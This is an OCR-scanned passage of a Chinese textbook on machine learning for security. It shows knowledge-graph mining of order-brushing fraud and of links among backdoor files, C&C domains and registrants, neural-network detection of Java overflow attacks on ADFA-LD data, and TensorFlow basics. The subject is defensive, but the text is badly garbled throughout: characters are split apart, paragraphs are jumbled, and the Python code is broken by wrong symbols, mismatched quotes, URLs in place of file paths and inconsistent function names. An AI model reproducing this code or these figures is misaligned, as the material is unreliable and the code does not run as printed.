国内 O2O 的 大 岩 补 贴 ， 滋 生 了 一 个 产业 链 ， 即 所 谓 的 “羊毛 党 ”和 “ 刷 单 ”。 有 一 批 人 对 搜集 各 大 电子 商城 、 银 行 、 
“羊毛 党 ” 们 主要 活跃 在 DO2O 平 台 或 电 商 平 


选择 地 参与 活动 ， 从 而 以 相对 较 低 成 本 甚至 零 成 本 换取 物质 上 的 实惠 。 这 一 行为 被 称 为 “天 羊 毛 ”， 而 关注 与 热衷 于 矿 羊 毛 的 群体 就 被 称 作 “羊毛 党 ”。 早 前 ， 
台 。 另 外 随 着 2015 年 互联 网 金融 的 发 展 ， 一 些 网 贷 平台 为 吸引 投资 者 常 推 出 一 些 收 益 丰厚 的 活动 ， 如 注册 认证 奖励 、 充 值 返 现 、 投 标 返 利 等 ， 催 生 了 以 此 为 生 的 投资 群体 ， 他 们 也 被 称 为 “P2P 羊 毛 党 ”。 
这 部 分 用 户 与 网 购 羊毛 党 不 同 ， 只 关注 互联 网 金融 产品 。 

刷 单 是 店家 付款 请 人 假扮 顾客 ， 用 以 假 乱 真 的 购物 方式 提高 网 店 的 排名 和 销量 ， 从 而 获取 好 评 吸引 顾客 ， 即 由 卖家 提供 购买 费用 ， 帮 指定 的 网 店 卖家 购买 商品 提高 销量 和 信用 度 ， 并 填写 虚假 好 评 的 行 
为 。 通 过 这 种 方式 ， 网 店 可 以 获得 较 好 的 搜索 排名 ， 比 如 ， 在 平台 搜索 时 按 “销量 ” 搜 索 ， 该 店铺 因为 销量 大 (即便 是 虚假 的 ) 会 更 容易 被 买 家 找到 。 刷 单一 般 可 分 为 两 种 : 一 是 单 品 刷 销量 为 做 爆 款 等 做 
准备 ;二 是 刷 信 誉 以 提高 店铺 整体 信誉 度 。 还 有 一 种 刷 单 更 为 直接 ， 以 外 卖 软 件 为 例子 ， 同 一 个 人 使 用 两 台 手 机 ， 分 别 安装 客户 下 单 软件 和 商家 接 单 软件 ， 一 下 一 接 ， 捞 取 补 贴 。 我 们 使 用 脱 敏 的 测试 数据 


来 演示 下 疑似 刷 单 的 情况 。 


测试 样本 分 为 两 部 分 ， 一 部 分 记录 了 设备 指纹 对 应 安装 的 App 以 及 App 的 登录 名 : 











hid=1,uid=mike, app=app1 
hid=2,uid=tony, app=appl 
hid=1, uid=john, app=app2 
hid=2,uid=john, app=app2 








. hid， 硬 件 指纹 ， 唯 一 标识 一 台 设 备 ; 
` uid，App 的 登录 用 户 名 ; 
“app, Appi) 24%. 


一 部 分 记录 了 App 的 登录 名 以 及 下 单 接 单 情况 : 


hid=1, uid=mike, action=buy 
hid-2,uid-tony,action-sell 





` hid， 硬 件 指纹 ， 唯 一 标识 一 台 设 备 ; 


.uid，App 的 登录 用 户 名 ; 
action， 用 户 行为 ， 是 下 单 还 是 接 单 。 


逻辑 上 对 应 的 拓扑 结构 如 图 13-23 所 示 。 








图 13-23 ”疑似 刷 单 示意 图 


从 拓扑 图 可 以 看 出 来 ,虽然 两 台 设 备 hid1 和 hid2 登 录 账 户 不 一 样 ， 但 是 他 们 共同 安装 的 App2 上 的 登录 用 户 名 相同 ， 从 而 可 以 判断 这 两 台 设 备 属于 同一 个 人 ,该 人 疑似 使 用 这 两 台 设 备 分 别 扮演 买 家 和 


家 进行 刷 单行 为 。 


逐 行 处 理 样本 文件 ， 获 取 对 应 的 hid，uid，app 字 段 : 

















with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample3.txt") as f: 
for line in f: 
line=line.strip('\n') 

hid, uid, app=line.split(',') 




















以 hid 为 中 心 ， 添 加 对 应 的 uid，app 节 点 : 





G.add edge(hid, uid) 
G.add edge(hid, app) 


逐 行 处 理 样 本 文件 ， 获 取 对 应 的 hjid，uid，action 字 段 : 














with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample4.txt") as f: 
for line in f: 
line=line.strip('\n"') 

hid, uid, action=line.split(',') 
































以 hid 为 中 心 ， 添 加 对 应 的 uid，action 节 点 : 


G.add edge(hid, uid) 
G.add edge(hid, action) 





可 视 化 知识 图 谱 : 





nx.draw(G, with labels-True, node size=600) 
plt.show () 





对 应 知识 图 谱 如 图 13-24 所 示 。 


* 
e C) uid=john  uid-mike 
uid=tony um 






action-sell 


9 ' 
app-app2 C action=buy 


图 13-24 ”疑似 刷 单行 为 知识 图 谱 


13.7 示例 : 知识 图 谱 在 威胁 情报 宦 域 的 应 用 


近 几 年 ， 威 胁 情报 在 信息 安全 领域 非常 热门 。 威 胁 情 报 基 于 海量 的 数据 分 析 ， 挖 气 潜 在 的 关联 关系 ， 为 其 他 安全 产品 提供 强大 的 数据 情报 支撑 ， 目 前 涌现 了 大 量 的 创业 企业 投入 到 威胁 情报 领域 。 


当今 是 万 物 互 联 的 时 代 ， 攻 击 入 口 无 处 不 在 ， 单 纯 基 于 漏洞 或 者 关键 资产 的 防御 方式 早已 力 不 能 及 。 因 此 ， 企 业 想 要 安全 地 开展 公司 业务 ， 就 必须 采取 更 加 全 面 、 高 效 的 防御 方式 。 威 胁 情报 的 出 现 弥 
补 了 这 一 不 足 ， 为 传统 防御 方式 带 来 了 有 效 补充 。 威 胁 情报 立足 于 攻击 者 的 视角 ， 依 靠 其 广泛 的 可 见 性 以 及 对 整个 互联 网 风险 及 威胁 的 全 面 理解 ， 帮 助 我 们 更 好 地 了 解 威胁 ， 包 括 : 可 能 的 攻击 目标 ， 使 用 
工具 、 方 法 ， 以 及 所 掌握 的 传输 武器 的 互联 网 基础 设施 情况 等 ， 使 遇 到 威胁 时 能 够 准确 、 高 效 地 采取 行动 。 在 2016 年 的 RSA 大 会 上 出 现 了 10 家 威胁 情报 公司 ， 其 中 包括 老牌 安全 公司 Symantec、Dell 
Security， 也 包括 大 量 新 秀 如 Webroot、Crowdstrike， 其 中 还 包含 国内 的 一 家 创业 公司 ThreatBook。 


ThreatBook 成 立 于 2015 年 7 月 ， 致 力 于 提供 及 时 、 准 确 的 威胁 情报 ， 用 来 阻截 攻击 、 发 现 威胁 、 漳 源 追 踪 和 消除 风险 。ThreatBook 的 主要 产品 TIC (威胁 情报 中 心 ) 的 威胁 应 用 解决 方案 ， 使 客户 在 面 
对 关键 威胁 时 可 以 快速 友 现 并 采取 有 效 的 行动 。 


完整 演示 代码 请 见 本 书 GitHub 上 的 13-6.py。 


13.7.1 “所 气 后 门 文件 潜在 联系 


黑 产 通常 通过 传播 后 门 文件 入 侵 主机 ， 组 织 起 庞大 的 僵尸 网 络 。 后 门 文件 通常 通过 连接 C&C 服务 器 的 域名 来 监听 控制 指令 ， 后 门 文 件 中 硬 编码 少量 C&C 服务 器 的 域名 ， 然 后 自动 化 下 载 最 近 的 C&C 服 
务 器 列表 。 通 过 静态 分 析 后 门 文件 中 硬 编码 的 域名 ， 关 联 分 析 域 名 和 文件 之 间 的 关系 ， 可 以 挖掘 出 后 门 文件 之 间 的 潜在 联系 。 我 们 使 用 脱 敏 的 测试 数据 来 挖掘 后 门 文件 之 间 潜 在 联系 的 原理 。 测 试 样本 记录 
了 若干 组 文件 和 C&C 域 名 的 对 应 关系 : 















































md5=filel,domain=domainl 
md5=filel, domain=domain2 
md5=filel,domain=domain3 
md5=filel,domain=domain6 
md5=file2,domain=domain2 
md5=file2,domain=domain3 
md5=file2,domain=domain4 
md5=file2,domain=domain5 





md5， 后 门 文件 md5 值 ; 


: domain，C&C 域 名 。 


逻辑 上 对 应 的 拓扑 结构 如 图 13-25 所 示 。 





. domain 1 





domain 





domain 


fle | | file2 A domain 5 





domain 4 





domain 3 





图 13-25 ”后 门 文件 潜在 关系 示意 图 


从 拓扑 图 可 以 看 出 ， 后 门 文件 file1 和 file2 分 别 对 应 C&C 域 名 domain1、domain2、domain3、domain6 和 domain2、domain3、domain4、domain5， 其 中 domain2 和 domain3 同 时 被 file1 和 file2 
使 用 ， 初步 怀疑 邮箱 file1 和 file1 为 同一 黑 产 团体 控制 的 后 门 文件 ，domain1 ~ domain4 均 疑似 黑 产 同时 控制 ， 并 很 可 能 是 同一 用 途 ， 比 如 DDoS。 


逐 行 处 理 样本 文件 ， 获 取 对 应 的 file，domain : 




















Book?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample6.txt") as f: 





with open ("http://www.hzcourse.com/resource/readi 
for line in f: 
line=line.strip('\n') 

file,domain=line.split(',') 




















以 file 为 中 心 ， 添 加 对 应 的 domain 节 点 : 








G.add edge(file, domain) 





可 视 化 知识 图 谱 : 





nx.draw(G, with labels-True, node size-600) 
plt.show () 





对 应 知识 图 谱 如 图 13-26 所 示 。 








domain=domain4 
domain=domain?2 


md5=file2 







domain=domain5 





md5=file1 C domain=domain6 






domain=domain3 C ) domain-domainl 


图 13-26 “后门 文件 潜在 关系 的 知识 图 谱 


13.7.2 ”挖掘 域名 潜在 联系 


黑 产 通常 会 注册 大 量 的 域名 用 于 C&C 服 务 器 、 钓 鱼 等 ， 注 册 域 名 时 会 登记 注册 人 的 邮箱 信息 ， 通 过 关联 IP、 注 册 邮 箱 、 域 名 可 以 挖掘 潜在 的 关联 关系 。 我 们 使 用 脱 敏 的 测试 数据 来 挖掘 域名 之 间 潜 在 联 


系 的 原理 。 测 试 样 本 记录 了 若干 组 IP、 注 册 邮 箱 、 域 名 的 对 应 关系 : 





mail-maill,domain-domainl,ip-ipl 
mail=maill, domain=domain3, ip=ip2 
mail=mail2,domain=domain2, ip=ip1l 
mail=mail2,domain=domain4, ip=ip2 
mail=mail2,domain=domain5, ip=ip3 
































: mail, iE AT Up #8 ; 


domain， 注册 域名 ; 


ip, EAS xt HIP. 


逻辑 上 对 应 的 拓扑 结构 如 图 13-27 所 示 。 





domain 5) 





maill mall2 





‘domain 3) domaln 4 








图 13-27 ”域名 潜在 关系 示意 图 


从 拓扑 图 可 以 看 出 ， 邮 箱 mail1 和 mail2 分 别 注册 了 域名 domain1、domain3 和 domain2、domain4、domain5， 其 中 domain1 和 domain2 都 指向 同一 个 ip1，domain3 和 domain4 都 指向 同一 个 
ip2， 初 步 怀 疑 邮箱 mail1 和 mail2 被 同一 黑 产 团体 控制 ，domain1 ~ domain4 均 疑似 黑 产 同时 控制 ， 并 很 可 能 是 同一 用 途 ， 比 如 C&C 服务 器 或 者 钓鱼 网 站 。 


逐 行 处理 样 本 文件 ， 获 取 对 应 的 mail，domain，ip: 




















with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample5.txt") as f: 
for line in f: 

line=line.strip('\n") 

mail,domain, ip=line.split(',') 




















以 mail 为 中 心 ， 添 加 对 应 的 domain 节 点 : 


G.add edge (mail, domain) 





以 domain 为 中 心 ， 添 加 对 应 的 ip 节点 : 


G.add edge (domain, ip) 





可 视 化 知识 图 谱 : 


nx.draw(G, with labels-True, node size=600) 
plt.show () 








对 应 知识 图 谱 如 图 13-28 所 示 。 


C Jdomain-domainl 
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C ) mail=maill 


ip=ip3 








人 《 入 mail=mail2 
C 
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domain=domain5 : 
ze domain=domain4 
(Jip=ip2 


图 13-28 ”域名 潜在 关系 的 知识 图 谱 


13.8 本章 小 结 


本 章 重点 介绍 图 算法 和 知识 图 谱 的 基础 知识 以 及 在 黑 产 团体 挖 据 、WebShell 检 测 方 面 的 相关 应 用 。 知 识 图 谱 其 实 可 以 理解 为 一 种 特殊 的 图 结构 ， 它 广泛 应 用 于 各 个 领域 ， 在 风 控 和 威胁 情报 领域 的 应 用 


远 比 本 章 的 例子 要 复杂 ， 需 要 大 家 结合 实际 情况 多 去 挖 据 。 
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第 14 章 ”神经 网 络 算法 


通常 ， 人 们 将 SVM、KNN 等 之 前 介绍 的 算法 理解 为 浅 层 学 习 ， 模 型 的 识别 能 力 更 多 取决 于 特征 选取 的 有 效 性 。 浅 层 学 习 使 用 时 ， 需 要 花费 至 少 一 半 的 时 间 在 数据 清洗 与 特征 提取 上 ， 有 人 形象 地 将 这 些 
步 又 称 为 “特征 工程 ”， 是 对 其 巨大 工作 量 的 一 种 描述 。 从 本 章 开始 我 们 介绍 神经 网 络 ， 后 面 章 节 介绍 深度 学 习 算 法 ， 神 经 网 络 是 人 类 第 一 次 从 自身 生理 结构 上 获得 灵感 ， 从 而 产生 的 一 种 新 算法 ， 从 某 种 


程度 来 说 ， 也 是 人 类 理解 自身 的 一 次 巨大 进步 。 


本 章 将 介绍 神经 网 络 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 并 通过 案例 介绍 如 何 使 用 神经 网 络 识别 基于 MNIST 的 验证 码 、 识 别 基 于 Java 的 溢出 攻击 。 


14.1. 神经 网 络 算法 概述 


人 的 大 脑 是 由 无 数 的 神经 元 组 成 的 复杂 网 络 ， 见 图 14-1。 神 经 元 是 具有 长 突起 的 细胞 ， 它 由 细胞 体 、 轴 突 和 树 突 组 成 。 





图 14-1 人 体 神 经 网 络 图 


每 个 神经 元 可 以 有 一 或 多 个 树 突 ， 其 结构 如 图 14-2 所 示 ， 可 以 接受 刺激 并 将 兴奋 传 入 细胞 体 。 每 个 神经 元 只 有 一 个 轴 突 ， 可 以 把 兴奋 从 胞 体 传送 到 另 一 个 神经 元 或 其 他 组 织 ， 如 肌肉 或 腺 体 。 神 经 元 信 
息 处 理 与 传递 过 程 如 图 14-3 所 示 。 





图 14-2 ”神经 元 结构 


Nb FH E 35! 





图 14-3 ”神经 元 信息 传递 处 理 过 程 


神经 网 络 算法 就 是 模拟 了 人 体 神 经 元 的 工作 原理 ， 多 个 输入 参数 ， 分 别 具 有 各 自 的 权重 ， 经 过 激励 函数 的 处 理 后 ， 得 到 和 输出， 如 图 14-4 所 示 。 输 出 可 以 再 对 接 下 一 级 的 神经 网 络 的 输入 ， 从 而 组 成 更 加 
复杂 的 神经 网 络 。 
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图 14-4 ”人工 神经 网 络 信息 传递 处 理 过 程 


大 脑 里 的 生物 神经 细胞 和 其 他 的 神经 细胞 是 相互 连接 在 一 起 的 。 为 了 创建 一 个 人 工 神经 网 络 ， 人 工 神经 细胞 也 要 以 同样 方式 相互 连接 在 一 起 。 为 此 可 以 有 许多 不 同 的 连接 方式 ， 其 中 最 容易 理解 并 且 也 
是 最 广泛 地 使 用 的 ， 就 是 把 神经 细胞 一 层 一 层 地 连结 在 一 起 。 这 一 种 类 型 的 神经 网 络 就 叫 前 馈 网 络 ， 如 图 14-5 所 示 。 


Hh ATE 


























图 14-5 “前 馈 网 络 神 经 网 络 


如 果 对 预测 错误 的 神经 元 施加 惩罚 ， 从 输出 层 开始 层 层 向 上 查找 预测 错误 的 神经 元 ， 微 调 这 些 神经 元 对 应 的 权重 ， 可 以 达到 修复 错误 的 目的 ， 这 样 的 算法 就 叫做 反 向 传播 算法 。scikit-Learn 中 的 神经 网 
络 实现 都 是 使 用 反 向 传播 算法 。 本 文 重 点 介绍 算法 在 安全 领域 的 应 用 ， 神 经 网 络 的 公式 推导 请 参考 其 他 机 器 学 习 专业 书籍 。 


14.2 示例 : hello world! 神经 网 络 


导入 相关 库 : 











from sklearn.neural network import MLPClassifier 











设置 训练 样本 以 及 对 应 的 标注 : 





>>> X 
>>> y 


实例 化 多 层 神 经 网 络 算法 ， 其 中 隐藏 层 一共 两 层 ， 对 应 神经 元 个 数 分 别 为 ?个 和 2 个 : 








>>> clf = MLPClassifier(solver-'lbfgs', alpha-1e-5, 
http://www. hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... hidden layer sizes=(5, 2), random state=1) 
>>> clf.fit(X, y) 












































>>> clf.predict([[2., 2.], [-1., -2.11) 
array([1, 0]) 








14.8 示例: 使 用 神经 网 络 算法 识别 验证 码 


MNIST 是 一 个 入 门 级 的 计算 机 视觉 数据 集 ， 如 图 14-6 所 示 ， 它 包含 各 种 手写 数字 图 片 ， 它 也 包含 每 一 张 图 片 对 应 的 标签 ， 告 诉 我 们 这 个 是 数字 几 。 我 们 使 用 神经 网 络 来 识别 由 MNIST 组 成 的 验证 码 。 完 
整 演示 代码 请 见 本 书 GitHub 上 的 14-1.py。 


24 x 24 的 图 片 5 ô l 





60 000 个 训练 





长 度 为 784 的 一 维 问 量 | ”特征 癌 量 


| 10 000 个 测试 


图 14-6 MNIST #46 
1. 数 据 搜集 和 数据 清洗 
在 线 抓 取 最 新 的 MNIST， 并 将 前 60000 个 样本 作为 训练 样本 ， 剩 下 的 作为 测试 样本 。 其 中 图 片 大 小 为 28x28， 所 以 输入 参数 个 数 为 784。 


如 果 出 现 样本 下 载 失 败 ， 可 以 直接 去 MNIST 网 站 上 下 载 ， 具 体 信息 可 以 参考 第 3 章 内 容 : 





import matplotlib.pyplot as plt 
from sklearn.datasets import fetch mldata 

from sklearn.neural network import MLPClassifier 
mnist = fetch mldata("MNIST original") 

X, y = mnist.data / 255., mnist.target 

X train, X test = X[:60000], X[60000:] 


y train, y test = y[:60000], y[60000:] 



























































2. 特 征 化 


实例 化 神经 网 络 算法 ， 隐 藏 层 为 一 层 ， 神 经 元 个 数 为 50: 





mlp = MLPClassifier (hidden layer sizes-(50,), max iter-10, alpha-1e-4, 
solver='sgd', verbose-10, tol=le-4, random state=1, 
learning rate init=.1) 




















3. 训 练 模型 








mlp.fit(X train, y train) 


4. 效 果 验 证 
验证 效果 : 
print("Training set score: $f" $ mlp.score(X train, y train)) 








osun 


("Test set score: $f 


oe oe 








print mlp.score(X test, y test) ) 





准确 率 达 到 了 97% 左 右 ， 效 果 非 常 不 错 : 





Training set score: 0.985733 


Test set Score: 0.971000 





14.4 示例 : 使 用 神经 网 络 算法 检测 Java 溢 出 攻击 


完整 演示 代码 请 见 本 书 GitHub 上 的 14-2.py。 
1. 数 据 搜集 和 数据 清洗 


使 用 ADFA-LD 数 据 集中 Java 溢 出 攻击 的 相关 数据 ( 见 图 14-7) ，ADFA-LD 数 据 集 详细 介绍 请 阅读 第 3 章 相关 内 容 。 


JAVA 应 用 





统 调用 系列 


HIDS ids F4 


第 系 殉 调用 


系统 调用 厅 列 序列 





器 量化 回 量 化 


系统 调用 回 量 系统 调用 问 量 


神经 网 络 训练 


图 14-7 ADFA-LD 系 统 调用 抽象 成 向 量 





加 载 ADFA-LD 中 的 正常 样本 数据 : 











def load adfa training files (rootdir): 
x=[] 
y=[] 
list = os.listdir (rootdir) 
for i in range (0, len(list)): 
path = os. path. join(rootdir, list[i]) 
if os.path.isfile (path): 
x.append(load one flle (path) ) 
y. append (0) 
return X,y 


























定义 遍历 目录 下 文件 的 函数 : 





def dirlist(path, allfile): 
filelist = os.listdir (path) 
for filename in filelist: 
Filepath = os.path.join(path, filename) 
if os.path.isdir(filepath): 
dirlist(filepath, allfile) 

else: 
allfile.append (filepath) 
return allfile 






















































































从 攻击 数据 集中 筛选 和 Java 溢 出 攻击 相关 的 数据 : 














def load adfa java files (rootdir): 
x=[] 
y=[] 
allfile=dirlist (rootdir, []) 

for file in allfile: 

if re.match( 















































r" http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/0E 
file): 

x.append (load one flle(file)) 

y.append (1) 





return X,y 











BPS/Text/../data/ADFA-LD/Attack Data Master/Java Meterpreter \d+/U 





2. 特 征 化 


由 于 ADFA-LD 数 据 集 都 记录 了 函 数 调用 序列 ， 且 每 个 文件 包含 的 函数 调用 序列 的 个 数 都 不 一 致 ， 可 以 参考 第 3 章 中 的 词 集 模型 进行 特征 化 。 














X1l,yl-load adfa training files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Training Data Master/") 
x2, y2=load adfa hydra ftp files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/ADFA-LD/Attack Data Master/" 
































X-XxX1-4X2 
y=ylty2 | 
vectorizer = CountVectorizer (min df-1) 
x-vectorizer.fit transform(x) 
x-x.toarray() 









































3. 训 





练 样本 


实例 化 神经 网 络 算法 ， 构 建 一 个 具有 两 层 隐 藏 层 的 多 层 神 经 网 络 : 





mlp = MLPClassifier(hidden layer sizes-(150,50), max iter-10, alpha-1e-4, 
solver='sgd', verbose-10, tol=le-4, random state=1, 
learning rate init=.1) 

















4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 : 





print cross validation.cross val score(mlp, x, y, n jobs--1,cv-10) 


测试 结果 如 下 ， 准 确 率 879% 左 右 ， 不 是 很 理想 : 





£x 


0.871493601917 


145 ”本章 小 结 


本 章 重 点 介绍 神经 网 络 算法 的 基础 知识 以 及 在 Web 安 全 领域 的 相关 应 用 。 本 章 是 神经 网 络 以 及 深度 学 习 的 基础 篇 ， 后 面 章 节 讲 逐步 揭 开 深度 学 习 的 神秘 面纱 。 


"HR 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
- http://blog.csdn.net/lizhengnanhua/atticle/details/9061755 
: https://wenku.baidu.com/view/01536f13a21614791711286b.html 


还 有 一 些 参考 文献 值得 一 读 : 


[1] G Creech.Developing a High-Accuracy Cross Platform Host-Based Intrusion Detection System Capable of Reliably Detecting Zero-Day Attacks.University of New South Wales, 2014. 


[2] S Forrest, S Hofmeyr, A Somayaji.The Evolution of System-Call Monitoring. Computer Security Applications Conference, 2008: 418-430. 


[3] S Forrest, S Hofmeyr, A Somayaji, T A Longstaff.A Sense of Self for Unix Processes.Secutity and Privacy, 1996. 


[4] S Hofmeyr, S.Forrest, A Somayaji.Intrusion Detection Using Sequences of System Calls.Journal of Computer Security, 1998. 


第 15 章 


多 层 感 其 机 与 DNN 算 法 


络 具备 更 强大 的 学 习 能 力 ， 本 章 将 介绍 隐藏 层 大 于 1 的 情况 ， 即 所 谓 的 多 层 感 知 机 和 


一 


介绍 如 何 使 用 不 同 神 


2l 2a 


在 上 一 章 ， 我 们 介绍 了 神经 网 络 的 基础 知识 ， 并 且 介 绍 了 当 隐 藏 层 为 1 时 的 简单 应 用 。 当 隐藏 层 大 于 1 时 ， 和 神经 网 
DNN 算 法 。 从 本 章 开始 我 们 将 接触 一 位 新 朋友 TensorFlow， 它 是 我 们 漫步 深度 学 习 领 域 的 一 位 好 帮手 。 
介绍 TensotFlow 的 基础 知识 ， 包 括 操 作 、 张 量 、 变 量 和 会 话 ， 以 及 TensotFlow 的 运行 模式 ， 包 括 单 机 模式 和 集群 模式 。 然 后 通过 案例 


本 章 将 介绍 神经 网 络 和 深度 学 习 的 区 别 和 联系 。 
经 网 络 算法 识别 基于 MNIST 数 据 集 的 验证 码 ， 如 何 用 朴素 贝 叶 斯 和 深度 神经 网 络 算法 来 识别 垃圾 邮件 。 


神经 网 络 与 深度 学 习 
隐藏 层 和 输出 层 组 成 ， 如 果 隐 藏 层 只 有 一 层 ， 就 是 最 简单 的 单 层 神经 


15.1 
奋 的 深度 学 习 算法 了 。 我 们 在 第 14 章 中 初步 介绍 了 神经 网 络 的 基本 知识 ， 神 经 网 络 由 输入 层 


M 


从 本 章 起 ， 我 们 就 要 开始 接触 令 人 兴 
网 络 ， 如 图 15-1 所 示 。 
al b 




















图 15-1 单 层 神经 网 络 





深度 学 习 就 是 多 层 感 知 机 的 一 种 。 


如 果 隐 藏 层 具有 多 层 ， 就 是 多 层 感知 机 ， 如 图 15-2 所 示 。 深 
就 是 每 个 隐藏 层 的 任何 一 个 节点 ， 都 与 下 一 层 隐 藏 层 的 全 部 节点 连接 ， 如 图 15-3 所 示 。 


狭义 的 多 层 感知 机 ， 要 求 必须 是 全 连接 的 ， 所 谓 全 连接 ， 序 


Eus A 


PSI EN 

















图 15-4 ” 非 全 连接 的 神经 网 络 


深度 神经 网 络 (Deep Neural Network, DNN) 就 是 一 种 全 连接 的 多 层 感知 机 。 常 见 的 深度 学 习 包 括 DNN、 卷 积 神经 网 络 (Convolutional Neural Network, CNN) 、 人 循环 神经 网 络 (Recurrent 
Neural Network，RNN) 。 


15.2 TensorFlow 编 程 模型 


TensorFlow 是 谷歌 研发 的 第 二 代 人 工 智 能 学 习 系 统 ， 其 命名 来 源 于 本 身 的 运行 原理 。Tensor 也 叫 张 量 ， 即 所 谓 的 N 维 数组 ; Flow 也 叫 流 ， 即 所 谓 基于 数据 流 图 的 计算 ; TensorFlow 为 张 量 从 流 图 的 一 
端 流动 到 另 一 端的 计算 过 程 。TensorFlow 将 复杂 的 数据 结构 传输 至 人 工 智能 神经 网 中 进行 分 析 和 处 理 ， 如 图 15-5 所 示 。 


SGD Trainer 








shape = [784,1] 


图 15-5 ”TensotFlow 官 网 的 示例 图 


TensorFlow 计 算 模型 中 ， 最 基础 的 4 个 组 件 是 操作 、 张 量 、 变 量 和 会 话 。 


15.2.1 操作 


把 算法 表示 成 一 个 个 操作 的 苔 加， 可 以 非常 清晰 地 看 到 | 数据 之 间 的 关系 ， 而 县 这样 的 基本 操作 也 具有 普遍 性 。 在 TensorFlow 中 ， 当 数据 流 过 操作 节点 的 时 候 就 可 以 对 数据 进行 操作 。 一 个 操作 可 以 有 和 零 
个 或 多 个 输入 ， 产 生 零 个 或 多 个 输出 。 一 个 操作 可 能 是 一 次 数学 计算 ， 一 个 变量 或 常量 ， 一 个 数据 流 走向 控制 ， 一 次 文件 IO 或 者 是 一 次 网 络 通信 。 其 中 ， 一 个 常量 可 以 看 成 没有 输入 、 只 有 一 个 固定 输出 的 
操作 。 


15.22 sK& 


在 计算 图 中 ， 每 个 边 就 代表 数据 从 一 个 操作 流 到 另 一 个 操作 。 这 些 数 据 被 表示 为 张 量 ， 一 个 张 量 可 以 看 成 多 维 的 数组 或 者 高 维 的 和 矩阵。 天 于 TensorFlow 中 的 张 量 ， 需 要 注意 的 是 张 量 本 身 并 没有 保存 任 
何 值 ， 张 量 仅仅 提供 了 访问 数值 的 一 个 接口 ， 可 以 看 成 数值 的 一 种 引用 。 在 TensorFlow 实 际 使 用 中 我 们 也 可 以 发 现 ， 在 run 之 前 的 张 量 并 没有 分 配 空间 ， 此 时 的 张 量 仅仅 表示 了 一 种 数值 的 抽象 ， 用 来 连接 
不 同 的 节点 ， 表 示 数 据 在 不 同 操作 之 间 的 流动 。 


15.2.3 ”变量 


变量 是 计算 图 中 可 以 改变 的 节点 。 比 如 当 计 算 权重 的 时 候 ， 随 着 和 迭代 的 进行 ， 每 次 权重 的 值 会 发 生 相 应 的 变化 ， 这 样 的 值 就 可 以 当 作 变量 。 在 实际 处 理 时 ， 一 般 把 需要 训练 的 值 指定 为 变量 。 在 使 用 变 
量 的 时 候 ， 需 要 指定 变量 的 初始 值 ， 变 量 的 大 小 和 数据 类 型 就 是 根据 初始 值 来 推断 的 。 


15.24 会 话 
在 TensorFlow 中 ， 所 有 操作 都 必须 在 会 话 (session) 中 执行 ， 会 话 负责 分 配 和 管理 各 种 资源 。 在 会 话 中 提供 了 一 个 run 方 法 ， 可 以 用 它 来 执行 计算 图 整体 或 者 其 中 的 一 部 分 节点 。 在 执行 run 方 法 时 ， 


(比如 CPU 或 GPU) ， 这 种 分 配 规则 由 TensorFlow 中 的 分 配 算法 决定 。 


15.3 TensorFlow 的 运行 模式 


TensorFlow 与 Scikit-Learn 的 区 别 除了 支撑 的 算法 不 一 样 ， 还 有 一 个 重要 的 区 别 一 一 TensorFlow 天 生 支 持 分 布 式 和 异 构 计算 环境 ， 从 单机 到 集群 ， 从 CPU 到 GPU ( 见 图 15-6) 都 支持 良好 。 





图 15-6 GPU 集群 


TensorFlow 支 持 最 基本 的 单机 模式 ， 如 图 15-7 所 示 ， 本 书 编写 的 样 例 也 都 是 基于 我 的 MAC 笔 记 本 运行 的 ,顺便 提 下 ，MAC 下 运行 TensorFlow 算 法 ,会 有 如 下 报错 信息 ， 不 用 理会 它 ， 程 序 还 会 继续 


\ 一 /一 


运行 。 








can't determine number of CPU cores: assuming 4 
I tensorflow/core/common runtime/local device.cc:25] Local device intra op parallelism threads: 4 

















client 


master 





图 15-7 TensotrFlow 单 机 运行 模式 


TensorFlow 也 支持 分 布 式 架 构 ， 如 图 15-8 所 示 ， 从 MAC 本 到 CPU 服务 器 、GPU 服 务 器 、GPU 集 群 甚至 是 神秘 的 TPU 集 群 都 支持 。 


client 


master 


worker 





图 15-8 TensotFlow 分 布 式 运行 模式 


15.4 示例 : 在 TensorFlow 下 识别 验证 码 (一 ) 


完整 演示 代码 请 见 本 书 GitHub 上 的 15-1.py。 


1. 数 据 清洗 与 特征 提取 

我 们 依然 使 用 M NIST 数 据 集合 ， 使 用 TensorFlow 的 softmax 回 归 算 法 ，MNIST 详 细 介绍 请 参考 第 3 章 中 的 介绍 。 唯 一 不 同 的 地 方 是 我 们 使 用 one-hot 编 码 处 理 标记 数据 ， 原 有 的 标记 数据 使 用 长 度 为 
的 向 量 标记 结果 ， 取 值 范 围 为 0 ~ 9，one-hot 编 码 又 称 一 位 有 效 编 码 ， 其 方法 是 使 用 N 位 状态 寄存 器 来 对 NN 个 状态 进行 编码 ， 每 个 状态 都 有 其 独立 的 寄存 器 位 ， 并 且 在 任意 时 刻 ， 其 中 只 有 一 位 有 效 。 使 用 
one-hot 编 码 后 ， 使 用 一 个 长 度 为 10 的 向 量 标记 结果 ， 转 换 的 函数 实现 为 : 





def get one hot (x,size=10): 
v-[] 

for xl in x: 
x2-[0]*size 
x2[(x1-1)]-1 
v.append (x2) 

return v 











我 们 使 用 离线 版 的 MNIST 文 件 ， 下 载 链接 为 : 








http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz 





文件 读 取 方 式 为 : 





import pickle 
import gzip 
def load data(): 

with gzip.open('./mnist.pkl.gz') as fp: 
